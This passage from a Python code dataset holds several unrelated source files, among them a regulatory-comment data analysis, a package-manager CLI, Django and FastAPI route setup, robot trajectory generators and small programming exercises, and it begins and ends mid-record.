pd.read_csv(os.path.join(dataDir,'comments','frDocComments.csv.gzip'),compression='gzip')\nultAgencyDocsDF = pd.read_csv(os.path.join(dataDir,'streams','ultAgencyDocuments.csv'))\norgCommentsDF = pd.read_csv(os.path.join(dataDir,'orgs','orgComments.csv'))\nagencyDF = loadAgencyDF()\n\n\n\n\nstreamsDF = pd.merge(streamsDF,agencyDF[['id','short_name']].rename(columns={'id':'ult_agency_id','short_name':'agency'}),'left')\n\n\nstreamsDF['publication_date'] = pd.to_datetime(streamsDF['publication_date'])\n\nstreamsDF['year'] = streamsDF['publication_date'].dt.year\nstreamsDF['year_float'] = streamsDF['year'] + streamsDF['publication_date'].dt.dayofyear / 365.25\n\n# Drop streams that include docs with a very large number of agencies\nstreamsDF['n_streams'] = streamsDF.groupby('document_number')['stream_id'].transform('nunique')\nstreamsDF[streamsDF['n_streams']<=5]\n\n# Drop streams that have a very large number of documents\nstreamsDF['n_docs'] = streamsDF.groupby('stream_id')['document_number'].transform('nunique')\nstreamsDF[streamsDF['n_docs'] <= 10]\n\n#Flag streams with exactly one proposal and one rule\nstreamsDF['is_proposal'] = streamsDF['type'] == 'Proposed Rule'\nstreamsDF['is_rule'] = streamsDF['type'] == 'Rule'\nstreamsDF['is_simple'] = streamsDF['type'].isin(['Proposed Rule','Rule','Notice','Comment Extension','ANPRM'])\n\n\nstreamsDF['simple'] = (streamsDF.groupby('stream_id')['is_proposal'].transform('sum') == 1) \\\n & (streamsDF.groupby('stream_id')['is_rule'].transform('sum') == 1) \\\n & (streamsDF.groupby('stream_id')['is_simple'].transform('sum') == streamsDF['n_docs'])\n\nstreamsDF['complete'] = (streamsDF.groupby('stream_id')['is_proposal'].transform('sum') >0) \\\n & (streamsDF.groupby('stream_id')['is_rule'].transform('sum') >0)\n\n\n# Add comment counts for extensions to the previous (non-extension) document\nstreamsDF = streamsDF.sort_values(['stream_id','publication_date','stream_order'])\nstreamsDF['is_step'] = ~streamsDF['type'].isin(['Notice','Comment Extension'])\nstreamsDF['stream_step'] = streamsDF.groupby('stream_id')['is_step'].cumsum()\n\n# Add change in lengths and paragraphs\ndiffDF = streamsDF[streamsDF['is_step']]\ndiffDF = diffDF.sort_values(['stream_id','stream_step'])\ndiffDF['legal_length_diff'] = diffDF.groupby('stream_id')['legal_length'].diff().shift(-1)\ndiffDF['discussion_length_diff'] = diffDF.groupby('stream_id')['discussion_length'].diff().shift(-1)\ndiffDF['legal_paragraphs_diff'] = diffDF.groupby('stream_id')['legal_paragraphs'].diff().shift(-1)\n\nfor c in 'legal_length','discussion_length','legal_paragraphs':\n diffDF[c+'_growth'] = diffDF[c+'_diff']/(diffDF[c] + 0.5*diffDF[c+'_diff'])\n\ndiffDF = diffDF[['stream_id','document_number']+[c for c in diffDF if c.endswith('_diff') or c.endswith('_growth')]]\n\nstreamsDF = pd.merge(streamsDF,diffDF,'left')\n\n\n\n#Compile frDoc comment counts\n\n#Link frDoc comments to (ult) agencies\ncommentCountsDF = pd.merge(frDocCommentsDF,agencyDF[['short_name','ult_agency_id']].rename(columns={'short_name':'agencyAcronym'}),'left')\n\ncommentCountsDF['count'] = 1\ncommentCountsDF['orgs'] = commentCountsDF['documentId'].isin(orgCommentsDF['documentId'])\ncommentCountsDF['attachments'] = commentCountsDF['attachmentCount'] > 0\ncommentCountsDF['org_attachments'] = commentCountsDF['orgs']*commentCountsDF['attachmentCount']\n\ncommentCountsDF = commentCountsDF.groupby(['document_number','ult_agency_id'])[['count','attachments','orgs','org_attachments','copies']].sum().reset_index()\n\n#Ientify linked documents that received no comments\nlinkedDF = ultAgencyDocsDF[ultAgencyDocsDF['reg_dot_gov_link']][['document_number','ult_agency_id']].drop_duplicates()\ncommentCountsDF = pd.merge(commentCountsDF,linkedDF,'outer')\n\nfor c in ['count','attachments','orgs','org_attachments','copies']:\n commentCountsDF[c] = commentCountsDF[c].fillna(0)\n\n# commentCountsDF['comment_linked'] = True\n\n# streamsDF.head(1).T\n# commentCountsDF.head(1).T\n# set(streamsDF.columns) & set(commentCountsDF.columns)\n\nstreamCommentsDF = pd.merge(streamsDF,commentCountsDF)\n\n#Merge comment counts for comment extensions\nagg = {c:'first' for c in streamCommentsDF.columns if c not in ['stream_id','stream_step']}\nagg.update({c:'sum' for c in ['count','copies','attachments','org_attachments']})\nstreamCommentsDF = streamCommentsDF.groupby(['stream_id','stream_step']).agg(agg).reset_index()\n\n# streamCommentsDF[streamCommentsDF['simple']].groupby('stream_id')['document_number'].count().value_counts()\n\n\n\nsimpleProposalsDF = streamsDF[streamsDF['simple'] & (streamsDF['type']=='Proposed Rule')].copy()\nsimpleProposalsAnnualDF = simpleProposalsDF.groupby('year').mean().reset_index()\n\n\nsimpleProposalCommentsDF = streamCommentsDF[streamCommentsDF['simple'] & (streamCommentsDF['type'] == 'Proposed Rule')]\n\n\n\n#Define plot style and helper functions-----------------------------------------\n\n\n#Turn off spines\nmpl.rcParams['axes.spines.top'] = False\nmpl.rcParams['axes.spines.right'] = False\nmpl.rcParams['axes.spines.bottom'] = False\nmpl.rcParams['axes.spines.left'] = False\n\n#Hide legend frame\nmpl.rcParams['legend.framealpha'] = 0\n\n\n\ndef formatLogscaleTicks(daxis):\n '''\n pass ax.axis or ax.yaxis to format that axis' ticks as log-scale values\n '''\n daxis.set_major_locator(ticker.MaxNLocator(integer=True))\n daxis.set_major_formatter(ticker.FuncFormatter(lambda v,p:'$10^{{{:0.0f}}}$'.format(v)))\n\n\ndef loglogLoessPlot(x_column,y_column,dataDF,**loes_args):\n data = dataDF[[x_column,y_column]]\n data = np.log10(data)\n data = data[(data >=0).all(axis=1)]\n\n ax = loessPlot(X=data[x_column],y=data[y_column],**loes_args)\n\n for axis in ax.xaxis,ax.yaxis:\n formatLogscaleTicks(axis)\n\n return ax\n\n\n# Summaries of change-----------------------------------------------------------\n\nplt.figure(figsize=(6,4))\nplt.subplot(2,1,1)\ndf = streamsDF[streamsDF['simple'] & (streamsDF['type']=='Proposed Rule')]\nax = sb.kdeplot(np.log10(df['legal_paragraphs']+1),gridsize=200,shade=True,lw=1,alpha=0.5,legend=False)\nax = sb.kdeplot(np.log10(df['discussion_paragraphs']+1),gridsize=200,shade=True,lw=1,alpha=0.5,legend=False)\nformatLogscaleTicks(ax.xaxis)\n\nax.set_ylabel('Proposed Rule density')\n\ncolorCycle = plt.rcParams['axes.prop_cycle'].by_key()['color']\nax.legend(handles=[mpl.patches.Patch(color=colorCycle[0],alpha=0.5,label='Legal paragraphs'),\n mpl.patches.Patch(color=colorCycle[1],alpha=0.5,label='Discussion paragraphs')])\n\nplt.subplot(2,1,2,sharex=ax)\ndf = streamsDF[streamsDF['simple'] & (streamsDF['type']=='Rule')]\nax = sb.kdeplot(np.log10(df['legal_paragraphs']+1),gridsize=200,shade=True,lw=1,alpha=0.5,legend=False)\nax = sb.kdeplot(np.log10(df['discussion_paragraphs']+1),gridsize=200,shade=True,lw=1,alpha=0.5,legend=False)\nformatLogscaleTicks(ax.xaxis)\nax.set_xlabel('paragraph count + 1')\nax.set_ylabel('Rule density')\n\nplt.savefig(os.path.join(plotDir,'simpleStreamsParagraphCountDensity.png'),bbox_inches='tight',dpi=100)\n\n\n\ndf = simpleProposalsDF[simpleProposalsDF['legal_paragraphs']>0]\n\nplt.figure(figsize=(6,4))\nax = loessPlot(np.log10(df['legal_paragraphs']),df['legal_paragraphs_growth'],scatter_kws={'s':3,'alpha':0.5},span=0.5)\nax.axhline(c='k',lw=1,alpha=0.5)\nformatLogscaleTicks(ax.xaxis)\nax.set_xlabel('legal paragraphs')\nax.set_ylabel('legal growth')\nplt.savefig(os.path.join(plotDir,'simpleProposalLegalParagraphGrowthByLegalParagraphs.png'),bbox_inches='tight',dpi=100)\n\n\nplt.figure(figsize=(6,4))\nax = loessPlot(np.log10(df['legal_paragraphs']),df['legal_paragraph_jaccard'],scatter_kws={'s':3,'alpha':0.5},span=0.5)\nax.axhline(c='k',lw=1,alpha=0.5)\nax.set_xlabel('legal paragraphs')\nax.set_ylabel('legal paragraph Jaccard index')\nplt.savefig(os.path.join(plotDir,'simpleProposalLegalParagraphJaccardByLegalParagraphs.png'),bbox_inches='tight',dpi=100)\n\n\n\n# Annual trends-----------------------------------------------------------------\n\n# plt.scatter(simpleProposalsAnnualDF['year'],simpleProposalsAnnualDF['legal_paragraph_jaccard'],c='k')\n#\n# plt.scatter(simpleProposalsAnnualDF['year'],simpleProposalsAnnualDF['legal_length'],c='k')\n#\n# plt.scatter(simpleProposalsAnnualDF['year'],simpleProposalsAnnualDF['legal_length_diff'],c='k')\n#\n# plt.scatter(simpleProposalsAnnualDF['year'],simpleProposalsAnnualDF['legal_length_growth'],c='k')\n#\n#\n# plt.figure(figsize=(6,4))\n# df = simpleProposalsDF[['year_float','legal_length_growth']].dropna()\n# ax=loessPlot(df['year_float'],df['legal_length_growth'],scatter=False,span=0.3)\n# ax.set_xlabel('Year')\n# ax.set_ylabel('legal growth')\n# plt.savefig(os.path.join(plotDir,'legalParagraphGrowthByTime.png'),bbox_inches='tight',dpi=100)\n#\n#\n# plt.figure(figsize=(6,4))\n# df = simpleProposalsDF[['year_float','legal_paragraph_jaccard']].dropna()\n# ax=loessPlot(df['year_float'],df['legal_paragraph_jaccard'],scatter=False,span=0.2)\n# ax.set_xlabel('Year')\n# ax.set_ylabel('legal paragraph Jaccard index')\n# plt.savefig(os.path.join(plotDir,'legalParagraphJaccardByTime.png'),bbox_inches='tight',dpi=100)\n#\n#\n# df = simpleProposalsDF[np.abs(simpleProposalsDF['legal_length_growth'])<2]\n# plt.scatter(df['year_float'],df['legal_length_growth'])\n#\n# loessPlot(df['year_float'],df['legal_length_growth'],scatter=False,span=0.2)\n# loessPlot(df['year_float'],df['legal_text_jaccard'],scatter=False,span=0.2)\n# loessPlot(df['year_float'],df['legal_length_diff'],scatter=False,span=0.2)\n#\n#\n# df = simpleProposalsDF.copy()\n# df['final_length'] = df['legal_length']+df['legal_length_diff']\n# loglogLoessPlot('legal_length','final_length',df,span=0.2,scatter_kws={'s':3})\n\n\n\n# Agency-level plots------------------------------------------------------------\n\n# dataDF = streamCommentsDF[streamCommentsDF.groupby('agency')['stream_id'].transform('nunique')>100]\ndataDF = streamsDF.groupby('agency').mean()\ndataDF['n_proposals'] = streamsDF.groupby('agency')['is_proposal'].sum()\ndataDF['total_legal_paragraphs'] = streamsDF.groupby('agency')['legal_paragraphs'].sum()\ndataDF = dataDF.reset_index()\n\nplt.figure(figsize=(6,4))\nplt.scatter(np.log10(dataDF['n_proposals']),np.log10(dataDF['total_legal_paragraphs']),s=10)\nax = plt.gca()\nax.set_xlabel('Number of proposals published')\nax.set_ylabel('Total legal paragraphs published')\nformatLogscaleTicks(ax.xaxis)\nformatLogscaleTicks(ax.yaxis)\nfor i,x,y,agency in dataDF[['n_proposals','total_legal_paragraphs','agency']].itertuples():\n if x > 0 and y>0:\n if np.random.uniform(0,1) < 3/(0.3*i+1):\n plt.text(np.log10(x)+0.05,np.log10(y),agency,verticalalignment='center')\nplt.savefig(os.path.join(plotDir,'agencyTotalLegalParagraphsByProposals.png'),bbox_inches='tight',dpi=100)\n\n\n\ndf = simpleProposalsDF[simpleProposalsDF['legal_paragraphs']>0]\ndataDF = df.groupby('agency').mean()\ndataDF['n_proposals'] = df.groupby('agency')['document_number'].count()\ndataDF = dataDF.reset_index()\n\ndataDF = dataDF[dataDF['n_proposals']>100]\n\nplt.figure(figsize=(6,4))\nplt.scatter(dataDF['legal_paragraph_jaccard'],dataDF['legal_paragraphs_growth'],s=0.3*dataDF['n_proposals'],alpha=0.7)\nax = plt.gca()\nax.set_xlabel('Legal paragraph Jaccard index')\nax.set_ylabel('Legal paragraph growth')\nfor i,x,y,n,agency in dataDF[['legal_paragraph_jaccard','legal_paragraphs_growth','n_proposals','agency']].itertuples():\n plt.text(x+3e-4*np.sqrt(n),y,agency,verticalalignment='center')\nplt.savefig(os.path.join(plotDir,'agencyLegalParagraphGrowthByLegalParagraphJaccard.png'),bbox_inches='tight',dpi=100)\n\n\n\n\n# Comments and change plots-----------------------------------------------------\n\n#Plot relationship between client expenditures and commenting\ndataDF = simpleProposalCommentsDF.copy()\ndataDF['copies-attachments'] = dataDF['copies'] - dataDF['attachments']\n\ndataDF = dataDF[['attachments','copies-attachments','legal_paragraphs','legal_paragraphs_growth','legal_paragraph_jaccard']].dropna()\n\ndataDF = dataDF[dataDF['legal_paragraphs']>0]\n\nplt.figure(figsize=(6,7))\n\nax = plt.subplot(2,1,1)\nax = loessPlot(np.log10(dataDF['attachments']+1),dataDF['legal_paragraphs_growth'],scatter_kws={'s':3},span=1,ax=ax)\nax = loessPlot(np.log10(dataDF['copies-attachments']+1),dataDF['legal_paragraphs_growth'],scatter_kws={'s':3},span=1,ax=ax)\nformatLogscaleTicks(ax.xaxis)\nax.set_ylabel('Legal paragraph growth')\nax.legend(['x = Attachments + 1','x = Copies - Attachments + 1'],loc='upper right')\n\nax = plt.subplot(2,1,2)\nax = loessPlot(np.log10(dataDF['attachments']+1),dataDF['legal_paragraph_jaccard'],scatter_kws={'s':3},span=1,ax=ax)\nax = loessPlot(np.log10(dataDF['copies-attachments']+1),dataDF['legal_paragraph_jaccard'],scatter_kws={'s':3},span=1,ax=ax)\nformatLogscaleTicks(ax.xaxis)\nax.set_ylabel('Legal paragraph Jaccard index')\n\nplt.savefig(os.path.join(plotDir,'simpleProposalLegalParagraphGrowthAndJaccardByAttachmentsAndCopies.png'),bbox_inches='tight',dpi=100)\n\n\n\nplt.figure(figsize=(6,3.5))\nax = loessPlot(np.log10(dataDF['attachments']+1),np.log10(dataDF['legal_paragraphs']),scatter_kws={'s':3},span=1)\nax = loessPlot(np.log10(dataDF['copies-attachments']+1),np.log10(dataDF['legal_paragraphs']),scatter_kws={'s':3},span=1)\nformatLogscaleTicks(ax.xaxis)\nformatLogscaleTicks(ax.yaxis)\nax.set_ylabel('Legal paragraphs')\nax.legend(['x = Attachments + 1','x = Copies - Attachments + 1'])\n\nplt.savefig(os.path.join(plotDir,'simpleProposalLegalParagraphsByAttachmentsAndCopies.png'),bbox_inches='tight',dpi=100)\n","sub_path":"analysis/regChange.py","file_name":"regChange.py","file_ext":"py","file_size_in_byte":13781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"34377214","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\n\n\"\"\"\nSimple python3 package manager.\n \n init\n Initial a new egg\n install\n Install all eggs in `eggs.txt`\n install -S section [eggs ...]\n Install `eggs` into the `section`\n install [eggs ...]\n Equals to `install -S prod [eggs ...]\n update\n Update all eggs in `eggs.txt`\n uninstall [eggs ...]\n Uninstall the given eggs\n list\n List all eggs in `eggs.txt`\n search\n Search egg\n -h\n this\n\"\"\"\n\nfrom argparse import ArgumentParser\n\nfrom . import search, install, uninstall, update, init, show, __VERSION__, __TITLE__\n\n\ndef parse_args():\n parser = ArgumentParser(prog=__TITLE__)\n subparsers = parser.add_subparsers(dest='action')\n parser_init = subparsers.add_parser('init', help='Initial an egg')\n parser_init.add_argument('path', nargs='?', const='.', default='.', help='egg directory')\n parser_install = subparsers.add_parser('install', help='Install python eggs')\n parser_install.add_argument('-S', '--section', nargs=1, help='Section of eggs')\n parser_install.add_argument('eggs', nargs='*', help='python eggs')\n parser_uninstall = subparsers.add_parser('uninstall', help='Uninstall eggs')\n parser_uninstall.add_argument('eggs', nargs='+', help='Python eggs')\n subparsers.add_parser('update', help='Update eggs')\n parser_list = subparsers.add_parser('list', help='List eggs')\n parser_list.add_argument('-a', '--all', nargs='?', const='all', default='', help='List all eggs')\n parser_search = subparsers.add_parser('search', help='Search eggs')\n parser_search.add_argument('eggs', nargs=1, help='Python eggs')\n subparsers.add_parser('version', help='Version')\n\n args = parser.parse_args()\n\n if args.action == 'init':\n init(args.path)\n elif args.action == 'install':\n install(args.eggs, args.section)\n elif args.action == 'update':\n update()\n elif args.action == 'list':\n show(args.all)\n elif args.action == 'search':\n search(args.eggs[0])\n elif args.action == 'uninstall':\n uninstall(args.eggs)\n elif args.action == 'version':\n print('eggs ' + __VERSION__)\n else:\n parser.print_help()\n\n\ndef main():\n parse_args()\n","sub_path":"mysite/venv/lib/python3.7/site-packages/eggs/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"369418153","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import MonthWithScheduleCalendar, ScheduleCreate, ScheduleUpdate, ScheduleDetail, delete_data, signupview, loginview, logoutview\n\napp_name = 'app'\n\nurlpatterns = [\n path('', MonthWithScheduleCalendar.as_view(), name='month_with_schedule'),\n path('month_with_schedule///', MonthWithScheduleCalendar.as_view(), name='month_with_schedule'),\n path('create/', ScheduleCreate.as_view(), name='create'),\n path('update//', ScheduleUpdate.as_view(), name='update'),\n path('detail//', ScheduleDetail.as_view(), name='detail'),\n path('delete//', delete_data, name='delete'),\n path('signup/', signupview, name='signup'),\n path('login/', loginview, name='login'),\n path('logout/', logoutview, name='logout'),\n]\n","sub_path":"mustlecalendarproject/mustlecalendarapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"243728827","text":"#!/usr/bin/python\n\nimport argparse\n\n\ndef find_max_profit(prices):\n # l\n # [1050, 270, 1540, 3800, 2]\n # h\n store = dict()\n best = None\n\n for price in prices:\n for key in store:\n if store[key] is None or store[key] < price - key:\n store[key] = price - key\n\n if best is None or store[key] > best:\n best = store[key]\n\n store[price] = -float(\"inf\")\n\n return best\n\n\nif __name__ == '__main__':\n # This is just some code to accept inputs from the command line\n parser = argparse.ArgumentParser(\n description='Find max profit from prices.')\n parser.add_argument('integers', metavar='N', type=int,\n nargs='+', help='an integer price')\n args = parser.parse_args()\n\n print(\"A profit of ${profit} can be made from the stock prices {prices}.\".format(\n profit=find_max_profit(args.integers), prices=args.integers))\n","sub_path":"stock_prices/stock_prices.py","file_name":"stock_prices.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162561695","text":"from abc import ABCMeta, abstractmethod\nfrom prrt.vehicle import Vehicle\nfrom prrt.primitive import PoseR2S1, CPoint, PointR2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport prrt.helper as helper\nfrom typing import List\nfrom prrt.grid import ObstacleGrid, CPointsGrid\nimport math\n\n\nclass PTG(metaclass=ABCMeta):\n \"\"\"\n Base class for parametrized trajectory generators.\n \"\"\"\n\n def __init__(self, size: float, vehicle: Vehicle, resolution: float):\n \"\"\"\n\n :type size: float > 0 (in meters). Map will extend from (-size,-size) to (size, size)\n :type vehicle: Vehicle. provides car_vertices and kinematics of the vehicle\n :type resolution: float > 0 (in meters). Resolution of map grid\n \"\"\"\n self._vehicle = vehicle\n self._delta_t = 0.0005\n self._alpha_resolution = np.deg2rad(3.)\n self._t_max = 100.0\n self._n_max = 10000\n self._d_max = size\n self.c_points = [] # type: List[List[CPoint]]\n self.idx_to_alpha = []\n self._turning_radius_ref = 0.1\n self.distance_ref = size\n self.obstacle_grid = ObstacleGrid(size, resolution)\n self._c_points_grid = CPointsGrid(size, resolution)\n self.name = 'PTG'\n\n @abstractmethod\n def build_cpoints(self):\n \"\"\"\n Builds a distance map for the given PTG, map size, resolution and vehicle\n \"\"\"\n pass\n\n @abstractmethod\n def get_distance(self, from_pose: PoseR2S1, to_pose: PoseR2S1) -> float:\n delta_pose = to_pose - from_pose\n return delta_pose.norm\n\n def alpha2idx(self, alpha: float) -> int:\n alpha = helper.wrap_to_npi_pi(alpha)\n if abs(alpha) > self._vehicle.alpha_max:\n alpha = np.sign(alpha) * self._vehicle.alpha_max\n delta = alpha + self._vehicle.alpha_max\n return int(np.rint(delta / self._alpha_resolution))\n\n @abstractmethod\n def inverse_WS2TP(self, p: PoseR2S1, tolerance=0.1) -> (bool, int, float):\n pass\n\n def get_cpoint_at_d(self, d: float, k: int) -> CPoint:\n assert k < len(self.c_points), 'k value exceeds bound'''\n for c_point in self.c_points[k]:\n if c_point.d >= d:\n return c_point\n\n\nclass CPTG(PTG):\n \"\"\"\n Circular path PTG. Paths are generated by selecting a fixed\n alpha\n \"\"\"\n\n def __init__(self, size: float, vehicle: Vehicle, resolution: float, K: int):\n self._K = K\n super(CPTG, self).__init__(size, vehicle, resolution)\n\n def build_cpoints(self):\n \"\"\"\n Builds a distance map for the given PTG, map size, resolution and vehicle\n \"\"\"\n k_theta = 1.\n min_dist = 0.015\n turning_radius = 0.1\n print('Starting building cpoints for {0}'.format(self.name))\n for alpha in np.arange(-self._vehicle.alpha_max, self._vehicle.alpha_max + self._alpha_resolution,\n self._alpha_resolution):\n t = 0.\n n = 0\n v = self._K * self._vehicle.v_max\n dist = 0.\n pose = PoseR2S1(0, 0, 0)\n last_pose = PoseR2S1(0, 0, 0)\n w = (alpha / np.pi) * self._vehicle.w_max\n rotation = 0. # same as pose.theta but defined over the range [0: 2PI)\n self.idx_to_alpha.append(alpha)\n points = [] # type: List[CPoint]\n while abs(rotation) < 1.95 * np.pi and t < self._t_max and dist < self._d_max and n < self._n_max:\n # if abs(v) < self._vehicle.v_max:\n # v += self._K * a * self._delta_t\n # if abs(v) > self._vehicle.v_max:\n # v = np.sign(v) * self._vehicle.v_max\n pose.x += math.cos(pose.theta) * v * self._delta_t\n pose.y += math.sin(pose.theta) * v * self._delta_t\n pose.theta += w * self._delta_t\n rotation += w * self._delta_t\n v_tp_space = np.sqrt(v * v + (w * turning_radius) * (w * turning_radius))\n dist += v_tp_space * self._delta_t\n delta_pose = pose - last_pose\n dist1 = delta_pose.norm\n dist2 = abs(delta_pose.theta) * k_theta\n dist_max = max(dist1, dist2)\n t += self._delta_t\n if dist_max > min_dist:\n points.append(CPoint(pose.copy(), t, dist, v, w))\n last_pose.copy_from(pose)\n n += 1\n self.c_points.append(points)\n print('Completed building cpoints for {0}'.format(self.name))\n\n def build_cpoints_grid(self):\n assert len(self.c_points) > 0, 'call build_cpoints before'\n print('Starting building cpoints grid for {0}'.format(self.name))\n k = 0\n for c_points_at_k in self.c_points:\n n = 0\n for c_point in c_points_at_k:\n ix = self._c_points_grid.x_to_ix(c_point.x)\n iy = self._c_points_grid.y_to_iy(c_point.y)\n self._c_points_grid.update_cell(ix, iy, k, n)\n n += 1\n k += 1\n print('Completed building cpoints grid for {0}'.format(self.name))\n\n def plot_cpoints(self):\n for c_points_at_k in self.c_points:\n x = [c_point.pose.x for c_point in c_points_at_k]\n y = [c_point.pose.y for c_point in c_points_at_k]\n plt.plot(x, y)\n plt.show()\n\n def build_obstacle_grid(self):\n from prrt.primitive import get_bounding_box, polygon_contains_point\n assert len(self.c_points) > 0, 'c_points don\\'t exist!'\n print('Starting building obstacle grid for {0}'.format(self.name))\n for k in range(len(self.idx_to_alpha)):\n c_points_at_k = self.c_points[k]\n for c_point in c_points_at_k:\n shape = self._vehicle.get_vertices_at_pose(c_point.pose)\n shape_bb = get_bounding_box(shape)\n x_idx_min = max(0, self.obstacle_grid.x_to_ix(shape_bb[0].x))\n y_idx_min = max(0, self.obstacle_grid.y_to_iy(shape_bb[0].y))\n x_idx_max = min(self.obstacle_grid.cell_count_x - 1, self.obstacle_grid.x_to_ix(shape_bb[1].x))\n y_idx_max = min(self.obstacle_grid.cell_count_y - 1, self.obstacle_grid.y_to_iy(shape_bb[1].y))\n for x_idx in range(x_idx_min - 1, x_idx_max + 1):\n cell = PointR2()\n cell.x = self.obstacle_grid.idx_to_x(x_idx)\n for y_idx in range(y_idx_min - 1, y_idx_max + 1):\n cell.y = self.obstacle_grid.idx_to_y(y_idx)\n if polygon_contains_point(shape, cell, shape_bb):\n self.obstacle_grid.update_cell(x_idx, y_idx, k, c_point.d)\n self.obstacle_grid.update_cell(x_idx - 1, y_idx, k, c_point.d)\n self.obstacle_grid.update_cell(x_idx, y_idx - 1, k, c_point.d)\n self.obstacle_grid.update_cell(x_idx - 1, y_idx - 1, k, c_point.d)\n print('{0} out of {1} complete!'.format(k + 1, len(self.idx_to_alpha)))\n print('Completed building obstacle grid for {0}'.format(self.name))\n\n def inverse_WS2TP(self, p: PoseR2S1, tolerance=0.1) -> (bool, int, float):\n is_exact = True\n if p.y != 0:\n R = (p.x * p.x + p.y * p.y) / (2 * p.y)\n Rmin = abs(self._vehicle.v_max / self._vehicle.w_max)\n if self._K > 0:\n if p.y > 0:\n theta = np.arctan2(p.x, abs(R) - p.y)\n else:\n theta = np.arctan2(p.x, p.y + abs(R))\n else:\n if p.y > 0:\n theta = np.arctan2(-p.x, abs(R) - p.y)\n else:\n theta = np.arctan2(-p.x, p.y + abs(R))\n # Arc length must be positive [0,2*pi]\n theta = helper.wrap_to_0_2pi(theta)\n # Distance through arc:\n d = theta * (abs(R) + self._turning_radius_ref)\n if abs(R) < Rmin:\n is_exact = False\n R = Rmin * np.sign(R)\n a = np.pi * self._vehicle.v_max / (self._vehicle.w_max * R)\n ik = self.alpha2idx(a)\n else:\n if np.sign(p.x) == np.sign(self._K):\n ik = self.alpha2idx(0)\n d = p.x\n is_exact = True\n else:\n ik = self.alpha2idx(np.pi)\n d = 1e+3\n is_exact = False\n # Normalize:\n d /= self.distance_ref\n assert ik >= 0, 'k index must not be negative'\n assert ik < len(self.c_points), 'ik exceeds limit'\n return is_exact, ik, d\n\n def get_distance(self, from_pose: PoseR2S1, to_pose: PoseR2S1) -> float:\n to_at_from = to_pose - from_pose\n is_exact, k, d = self.inverse_WS2TP(to_at_from)\n if is_exact:\n return d * self.distance_ref\n else:\n return float('inf')\n","sub_path":"prrt/ptg.py","file_name":"ptg.py","file_ext":"py","file_size_in_byte":9000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"161890144","text":"import os.path\n\nclass BaseTestCase(object):\n\n def prepare_screenshots_dir(self):\n class_dir = os.path.join(os.path.join(self.config['sframe']['output'], self.__class__.__name__))\n if not os.path.exists(class_dir):\n os.makedirs(class_dir)\n method_dir = os.environ[\"SCREENSHOTS_DIR\"] = os.path.join(class_dir, self.current_method)\n if not os.path.exists(method_dir):\n os.makedirs(method_dir)\n\n return method_dir ","sub_path":"framework/base/BaseTest.py","file_name":"BaseTest.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"365200131","text":"###.1\r\n#\r\n# def factorial(N):\r\n#\r\n# if N <= 1:\r\n#\r\n# return 1\r\n#\r\n# return N * factorial(N-1)\r\n#\r\n# print(factorial(10))\r\n#\r\n\r\n###.2\r\n\r\nN = int(input())\r\n\r\nresult = 1\r\n\r\nfor i in range(1,N+1):\r\n\r\n result = result * i\r\n\r\nprint(result)","sub_path":"백준_10872_구현_B3.py","file_name":"백준_10872_구현_B3.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"111489883","text":"import time\n\nfrom fastapi.logger import logger\n\nimport dependency\nfrom fastapi import FastAPI, Request\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom starlette import status\nfrom starlette.responses import JSONResponse\n\nfrom dependency import CredentialException, pool\nfrom routers.auth import auth_router\nfrom routers.model import model_router\n\napp = FastAPI()\n\n\napp.include_router(\n auth_router,\n prefix=\"/auth\",\n tags=[\"auth\"],\n responses={404: {\"detail\": \"Not found\"}},\n)\n\napp.include_router(\n model_router,\n prefix=\"/model\",\n tags=[\"models\"],\n responses={404: {\"detail\": \"Not found\"}},\n)\n\n\n@app.exception_handler(CredentialException)\nasync def credential_exception_handler(request: Request, exc: CredentialException):\n return JSONResponse(\n status_code=status.HTTP_401_UNAUTHORIZED,\n content={\n \"status\": 'failure',\n \"detail\": \"Unable to validate credentials.\"\n },\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n\n\n# -------------------------------\n# Web Server Configuration\n# -------------------------------\n\n# Must have CORSMiddleware to enable localhost client and server\norigins = [\n \"http://localhost\",\n \"http://localhost:3000\",\n \"http://localhost:5057\",\n \"http://localhost:5000\",\n \"http://localhost:6379\",\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\n# -------------------------------\n# Basic Routes\n# -------------------------------\n\n\n@app.get(\"/\")\nasync def root():\n return {\n \"status\": \"success\",\n \"detail\": 'PhotoAnalysisServer is Running'\n }\n\n\n@app.on_event('shutdown')\ndef on_shutdown():\n \"\"\"\n On server shutdown, stop all background model pinging threads, as well as clear\n the redis model prediction queue\n \"\"\"\n\n dependency.shutdown = True # Send shutdown signal to threads\n pool.shutdown() # Clear any non-processed jobs from thread queue\n dependency.prediction_queue.empty() # Removes all pending jobs from the queue\n\n","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"61060743","text":"\nfrom tkinter import *\nname = \"\"\n\ndef inputpage():\n global name\n name = entry.get()\n root.destroy()\n import inputs_page\n \nroot=Tk()\n\nroot.geometry(\"500x500\")\nroot.config(background='lavender')\nroot.resizable(False,False)\ntop1=Label(root, text='Fianancial management App',background='light sea green').place(x=166,y=10)\nname_label=Label(root, text='Please enter your name:').place(x=20, y=50)\nentry=Entry(root, width=30).place(x=150, y=50)\nentry.pack()\nentry.focus_set()\nname_enterb=Button(root, 